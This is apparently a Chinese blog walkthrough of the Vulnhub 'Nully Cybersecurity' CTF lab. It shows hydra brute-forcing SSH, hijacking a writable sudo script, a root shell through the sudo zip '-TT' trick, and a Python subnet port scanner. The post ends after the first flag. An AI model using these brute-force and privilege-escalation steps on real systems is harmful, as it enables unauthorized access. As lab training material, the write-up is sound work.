首页 > 其他分享 >Vulnhub之Nully Cybersecurity靶机详细测试过程

Vulnhub之Nully Cybersecurity靶机详细测试过程

时间:2022-11-28 10:46:31浏览次数:45  
标签:bin Nully Cybersecurity 0.0 echo 88 Vulnhub root x20

Nully Cybersecurity

靶机基本信息

名称:Nully Cybersecurity: 1

地址:


提示:

While working with the machine, you will need to brute force,
pivoting (using metasploit, via portfwd), exploitation web app, and
using searchsploit.

About: Wait 5-8 minutes before starting for the machine to start its services. Also, check the welcome page on port 80.

Hints: 'cat rockyou.txt | grep bobby > wordlist' for generating wordlist.

识别目标主机IP地址

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.104.0/16   |   Screen View: Unique Hosts                                                       
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:be:bb:0d      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.231  08:00:27:8a:e6:45      1      60  PCS Systemtechnik GmbH           

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.231

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.231 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 20:35 EST
Nmap scan report for bogon (192.168.56.231)
Host is up (0.000098s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to the Nully Cybersecurity CTF
|_http-server-header: Apache/2.4.29 (Ubuntu)
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) USER RESP-CODES CAPA AUTH-RESP-CODE UIDL TOP PIPELINING
2222/tcp open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d:c1:b0:f5:0a:3d:1c:32:80:91:14:c5:3b:04:e1:3e (RSA)
|   256 cb:22:f4:e3:e1:f1:61:68:58:91:9a:96:19:35:2c:ff (ECDSA)
|_  256 a5:e3:48:57:49:55:85:f9:8c:9a:c1:8c:a6:49:f5:2d (ED25519)
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9000/tcp open  cslistener?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: max-age=31536000
|     Content-Length: 23203
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Wed, 22 Jul 2020 22:47:36 GMT
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Mon, 28 Nov 2022 01:35:46 GMT
|     <!DOCTYPE html
|     ><html lang="en" ng-app="portainer">
|     <head>
|     <meta charset="utf-8" />
|     <title>Portainer</title>
|     <meta name="description" content="" />
|     <meta name="author" content="Portainer.io" />
|     <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
|     <!--[if lt IE 9]>
|     <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script>
|     <![endif]-->
|     <!-- Fav and touch icons -->
|     <link rel="apple-touch-icon" sizes="180x180" href="dc4d092847be46242d8c013d1bc7c494.png" />
|_    <link rel="icon" type="image/png" sizes="32x32" href="5ba13dcb526292ae707310a54e103cd1.png"
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9000-TCP:V=7.92%I=7%D=11/27%Time=63841072%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,5BC1,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges
SF::\x20bytes\r\nCache-Control:\x20max-age=31536000\r\nContent-Length:\x20
SF:23203\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:
SF:\x20Wed,\x2022\x20Jul\x202020\x2022:47:36\x20GMT\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Mo
SF:n,\x2028\x20Nov\x202022\x2001:35:46\x20GMT\r\n\r\n<!DOCTYPE\x20html\n><
SF:html\x20lang=\"en\"\x20ng-app=\"portainer\">\n\x20\x20<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20\x20\x20<title>Portain
SF:er</title>\n\x20\x20\x20\x20<meta\x20name=\"description\"\x20content=\"
SF:\"\x20/>\n\x20\x20\x20\x20<meta\x20name=\"author\"\x20content=\"Portain
SF:er\.io\"\x20/>\n\n\x20\x20\x20\x20<!--\x20HTML5\x20shim,\x20for\x20IE6-
SF:8\x20support\x20of\x20HTML5\x20elements\x20-->\n\x20\x20\x20\x20<!--\[i
SF:f\x20lt\x20IE\x209\]>\n\x20\x20\x20\x20\x20\x20<script\x20src=\"//html5
SF:shim\.googlecode\.com/svn/trunk/html5\.js\"></script>\n\x20\x20\x20\x20
SF:<!\[endif\]-->\n\n\x20\x20\x20\x20<!--\x20Fav\x20and\x20touch\x20icons\
SF:x20-->\n\x20\x20\x20\x20<link\x20rel=\"apple-touch-icon\"\x20sizes=\"18
SF:0x180\"\x20href=\"dc4d092847be46242d8c013d1bc7c494\.png\"\x20/>\n\x20\x
SF:20\x20\x20<link\x20rel=\"icon\"\x20type=\"image/png\"\x20sizes=\"32x32\
SF:"\x20href=\"5ba13dcb526292ae707310a54e103cd1\.png\"")%r(HTTPOptions,340
SF:6,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\nCache-Control:\
SF:x20max-age=31536000\r\nContent-Length:\x2023203\r\nContent-Type:\x20tex
SF:t/html;\x20charset=utf-8\r\nLast-Modified:\x20Wed,\x2022\x20Jul\x202020
SF:\x2022:47:36\x20GMT\r\nX-Content-Type-Options:\x20nosniff\r\nX-Xss-Prot
SF:ection:\x201;\x20mode=block\r\nDate:\x20Mon,\x2028\x20Nov\x202022\x2001
SF::35:46\x20GMT\r\n\r\n<!DOCTYPE\x20html\n><html\x20lang=\"en\"\x20ng-app
SF:=\"portainer\">\n\x20\x20<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf
SF:-8\"\x20/>\n\x20\x20\x20\x20<title>Portainer</title>\n\x20\x20\x20\x20<
SF:meta\x20name=\"description\"\x20content=\"\"\x20/>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"author\"\x20content=\"Portainer\.io\"\x20/>\n\n\x20\x20\x2
SF:0\x20<!--\x20HTML5\x20shim,\x20for\x20IE6-8\x20support\x20of\x20HTML5\x
SF:20elements\x20-->\n\x20\x20\x20\x20<!--\[if\x20lt\x20IE\x209\]>\n\x20\x
SF:20\x20\x20\x20\x20<script\x20src=\"//html5shim\.googlecode\.com/svn/tru
SF:nk/html5\.js\"></script>\n\x20\x20\x20\x20<!\[endif\]-->\n\n\x20\x20\x2
SF:0\x20<!--\x20Fav\x20and\x20touch\x20icons\x20-->\n\x20\x20\x20\x20<link
SF:\x20rel=\"apple-touch-icon\"\x20sizes=\"180x180\"\x20href=\"dc4d092847b
SF:e46242d8c013d1bc7c494\.png\"\x20/>\n\x20\x20\x20\x20<link\x20rel=\"icon
SF:\"\x20type=\"image/png\"\x20sizes=\"32x32\"\x20href=\"5ba13dcb526292ae7
SF:07310a54e103cd1\.png\"");
MAC Address: 08:00:27:8A:E6:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.99 seconds

Get Access

访问端口80,返回页面告知:

To start, check your email on port 110 with authorization data pentester:qKnGByeaeQJWTjj2efHxst7Hu0xHADGO

因此从110端口:

┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ telnet 192.168.56.231 110
Trying 192.168.56.231...
Connected to 192.168.56.231.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
user pentester
+OK
pass qKnGByeaeQJWTjj2efHxst7Hu0xHADGO
+OK Logged in.
list
+OK 1 messages:
1 657
.
retr 1
+OK 657 octets
Return-Path: <root@MailServer>
X-Original-To: pentester@localhost
Delivered-To: pentester@localhost
Received: by MailServer (Postfix, from userid 0)
        id 20AE4A4C29; Tue, 25 Aug 2020 17:04:49 +0300 (+03)
Subject: About server
To: <pentester@localhost>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20200825140450.20AE4A4C29@MailServer>
Date: Tue, 25 Aug 2020 17:04:49 +0300 (+03)
From: root <root@MailServer>

Hello,
I'm Bob Smith, the Nully Cybersecurity mail server administrator.
The boss has already informed me about you and that you need help accessing the server.
Sorry, I forgot my password, but I remember the password was simple.
.

现在知道用户名为bob, 而密码列表可以由rockyou.txt生成(作者提示)

┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ cat /usr/share/wordlists/rockyou.txt | grep bobby > wordlist              
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ ls     
login.exe  login_support.dll  nmap_full_scan  wordlist
                                                       
┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ hydra -l bob -P wordlist ssh://192.168.56.231 -s 2222
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-27 20:58:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2453 login tries (l:1/p:2453), ~154 tries per task
[DATA] attacking ssh://192.168.56.231:2222/
[STATUS] 142.00 tries/min, 142 tries in 00:01h, 2313 to do in 00:17h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 2159 to do in 00:22h, 14 active
[2222][ssh] host: 192.168.56.231   login: bob   password: bobby1985
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-27 21:04:18

┌──(kali㉿kali)-[~/Vulnhub/Nully]
└─$ ssh [email protected] -p 2222
The authenticity of host '[192.168.56.231]:2222 ([192.168.56.231]:2222)' can't be established.
ED25519 key fingerprint is SHA256:ZU7BEqKthDZgUp1P4/iydwfRHNZnBUzH9kUVbcqbM9A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.231]:2222' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Aug 27 16:14:40 2020 from 172.17.0.1
bob@MailServer:~$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob)
bob@MailServer:~$ sudo -l
Matching Defaults entries for bob on MailServer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on MailServer:
    (my2user) NOPASSWD: /bin/bash /opt/scripts/check.sh
bob@MailServer:~$ cat /opt/scripts/check.sh
#!/bin/bash
echo "This is script for check security on the server by laf3r"
echo "Script runned as $USER"

echo "                    "

echo "Users on the server:"
echo "                    "

/usr/bin/cat /etc/passwd | grep root
/usr/bin/cat /etc/passwd | grep home
echo "--------------------"

echo "                    "
echo "Active services:"
echo "                    "

/usr/sbin/service --status-all | grep +

echo "--------------------"

echo "                    "
echo "Current network connections:"
echo "                    "

/usr/bin/netstat -A inet –program

echo "--------------------"

echo "                    "
echo "Check internet connection (ping goole.com)"

echo "                    "
if ping www.google.com &> /dev/null; then
    echo "Internet connection is active"
else
    echo "Internet connection is not available"
fi

echo "--------------------"

echo "                    "
echo "Active processes:"
echo "                    "

/usr/bin/ps -aux

echo "--------------------"

echo "                    "
echo "Web Server files: "

/usr/bin/ls -la /var/www/html

echo "--------------------"

echo "                    "
echo "List of disks:"
echo "                    "

/usr/bin/lsblk

echo "--------------------"
bob@MailServer:~$ ls -alh /opt/scripts/check.sh
-rw-r--r-- 1 bob bob 1.3K Aug 25  2020 /opt/scripts/check.sh
bob@MailServer:~$ echo "/bin/bash" >> /opt/scripts/check.sh
bob@MailServer:~$ 
bob@MailServer:~$ sudo -u my2user /bin/bash /opt/scripts/check.sh
sudo: setrlimit(RLIMIT_CORE): Operation not permitted
This is script for check security on the server by laf3r
Script runned as my2user
                    
Users on the server:
                    
root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:Bob Smith,,,,I am sysadmin of the Nully Cybersecurity mail server:/home/bob:/bin/bash
my2user:x:1001:1001:,,,:/home/my2user:/bin/bash
pentester:x:1002:1002::/home/pentester:/usr/sbin/nologin
--------------------
                    
Active services:
                    
 [ ? ]  hwclock.sh
 [ + ]  postfix
 [ + ]  ssh
--------------------
                    
Current network connections:
                    
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0     36 MailServer:ssh          192.168.56.206:56008    ESTABLISHED
--------------------
                    
Check internet connection (ping goole.com)
                    
Internet connection is not available
--------------------
                    
Active processes:
                    
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   4244  3344 pts/0    Ss+  04:30   0:00 /bin/bash
root       641  0.0  0.1  38036  5248 ?        Ss   04:31   0:00 /usr/lib/postfix/sbin/master
postfix    645  0.0  0.1  38064  5344 ?        S    04:31   0:00 pickup -l -t unix -u -c
postfix    646  0.0  0.1  38116  5332 ?        S    04:31   0:00 qmgr -l -t unix -u
root       652  0.0  0.1  12164  4292 ?        Ss   04:31   0:00 sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
root       660  0.0  0.0   4536  2724 ?        Ss   04:31   0:00 /usr/sbin/dovecot -c /etc/dovecot/dovecot.conf
dovecot    665  0.0  0.0   4248   996 ?        S    04:31   0:00 dovecot/anvil
root       666  0.0  0.0   4388  2840 ?        S    04:31   0:00 dovecot/log
root       667  0.0  0.1   5536  4160 ?        S    04:31   0:00 dovecot/config
dovecot    670  0.0  0.0   4388  2704 ?        S    04:35   0:00 dovecot/stats
root       938  0.0  0.1  12640  8052 ?        Ss   05:05   0:00 sshd: bob [priv]
bob        953  0.0  0.1  12640  4632 ?        S    05:05   0:00 sshd: bob@pts/1
bob        954  0.0  0.0   5996  3852 pts/1    Ss   05:05   0:00 -bash
root       962  0.0  0.0   6756  3776 pts/1    S+   05:07   0:00 sudo -u my2user /bin/bash /opt/scripts/check.sh
my2user    963  0.0  0.0   5784  3416 pts/1    S+   05:07   0:00 /bin/bash /opt/scripts/check.sh
my2user   1012  0.0  0.0   7636  3272 pts/1    R+   05:07   0:00 /usr/bin/ps -aux
--------------------
                    
Web Server files: 
/usr/bin/ls: cannot access '/var/www/html': No such file or directory
--------------------
                    
List of disks:
                    
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
sda      8:0    0   20G  0 disk 
├─sda1   8:1    0    1M  0 part 
├─sda2   8:2    0    1G  0 part 
└─sda3   8:3    0   19G  0 part 
sr0     11:0    1 1024M  0 rom  
--------------------
my2user@MailServer:/home/bob$ id
uid=1001(my2user) gid=1001(my2user) groups=1001(my2user)
my2user@MailServer:/home/bob$ 

这样就拿到了my2user的shell

my2user@MailServer:/var$ sudo -l
Matching Defaults entries for my2user on MailServer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User my2user may run the following commands on MailServer:
    (root) NOPASSWD: /usr/bin/zip
my2user@MailServer:/var$ TF=$(mktemp -u)
my2user@MailServer:/var$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 33%)
# cd /root
# ls -alh
total 40K
drwx------ 1 root root 4.0K Aug 27  2020 .
drwxr-xr-x 1 root root 4.0K Aug 25  2020 ..
-rw------- 1 root root    0 Nov 28 04:31 .bash_history
-rw-r--r-- 1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 25  2020 .local
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
-rwxr-xr-x 1 root root  241 Aug 27  2020 .services
drwx------ 2 root root 4.0K Aug 27  2020 .ssh
-rw------- 1 root root 7.7K Aug 27  2020 .viminfo
-rw-r--r-- 1 root root  723 Aug 25  2020 1_flag.txt
# cat 1_flag.txt

       .88888.                          dP           dP          dP       
      d8'   `88                         88           88          88       
      88        .d8888b. .d8888b. .d888b88           88 .d8888b. 88d888b. 
      88   YP88 88'  `88 88'  `88 88'  `88           88 88'  `88 88'  `88 
      Y8.   .88 88.  .88 88.  .88 88.  .88    88.  .d8P 88.  .88 88.  .88 
       `88888'  `88888P' `88888P' `88888P8     `Y8888'  `88888P' 88Y8888' 
      oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
                                                                          
        Mail server is rooted.
        You got the first flag: 2c393307906f29ee7fb69e2ce59b4c8a
        Now go to the web server and root it.

# 

这样就拿到了第一个flag.

# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.5  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:ac:11:00:05  txqueuelen 0  (Ethernet)
        RX packets 3737  bytes 456415 (456.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3546  bytes 512745 (512.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

# hostname
MailServer
# uname -a
Linux MailServer 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
# ping 172.17.0.1
sh: 7: ping: not found
# which python
# which python3
/usr/bin/python3
#                 

从这些信息可以看出Mail Server 应该运行在容器里,因此第一步需要知道还有哪些主机,而Mail Server里没有ping,我们可以写一个python脚本,看哪个主机运行web

import socket
import sys
def scan_ip(ip):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((ip,80))
        print("IP:%s"%ip)
    except:
        pass

network_prefix = '172.17.0.'
for i in range(1,255):
    ip = network_prefix + str(i)
    scan_ip(ip)

标签:bin,Nully,Cybersecurity,0.0,echo,88,Vulnhub,root,x20
From: https://www.cnblogs.com/jason-huawen/p/16931562.html

相关文章

  • vulnhub靶场之THOTH TECH: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:THOTHTECH:1,下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova,下载后直接vbox打开即可。知识点:find提权、hydra......
  • Vulnhub之MoneyBox 1靶机详细测试过程
    MoneyBox作者:jason_huawen靶机基本信息名称:MoneyBox:1地址:https://www.vulnhub.com/entry/moneybox-1,653/识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Mo......
  • vulnhub靶场隐写相关内容
    图片隐写steghideinfotrytofind.jpg#检测图片steghideextract-sftrytofind.jpg#提取图片隐写信息音频隐写工具下载地址:https://github.com/hacksudo/Soun......
  • vulnhub靶场压缩文件解密
    fcrackzip爆破fcrackzip-D-p/usr/share/wordlists/rockyou.txt-usecr3tSteg.zipjohn爆破zip2johnsecr3tSteg.zip|teehash#转换为可识别的hashjohnhashdi......
  • Vulnhub之The Planets Mercury靶机详细测试过程
    ThePlanets:Mercury作者:jason_huawen靶机基本信息名称:ThePlanets:Mercury地址:https://www.vulnhub.com/entry/the-planets-mercury,544/识别目标主机IP地址─......
  • vulnhub靶场之EVILBOX: ONE
    准备:攻击机:虚拟机kali、本机win10。靶机:EVILBOX:ONE,下载地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova,下载后直接vbox打开即可。知识点:文件包含漏洞、f......
  • Vulnhub之M87靶机详细测试过程
    M87识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/M87]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.59.0/16|ScreenView:UniqueHosts......
  • Vulnhub之Loly靶机详细测试过程
    Loly作者:Jason_huawen靶机基本信息名称:Loly:1地址:https://www.vulnhub.com/entry/loly-1,538/识别目标主机IP地址目标主机无法从Virtualbox自动获取IP地址,先参照......
  • Vulnhub之KiraCTF靶机解题过程
    KiraCTF作者:jason_huawen靶机基本信息名称:Kira:CTF地址:https://www.vulnhub.com/entry/kira-ctf,594/识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/KiraCTF]......
  • Vulnhub之KB Vuln 2靶机详细解题过程
    KBVuln2作者:jason_huawen靶机基本信息名称:KB-VULN:2地址:https://www.vulnhub.com/entry/kb-vuln-2,562/识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/KB_Vu......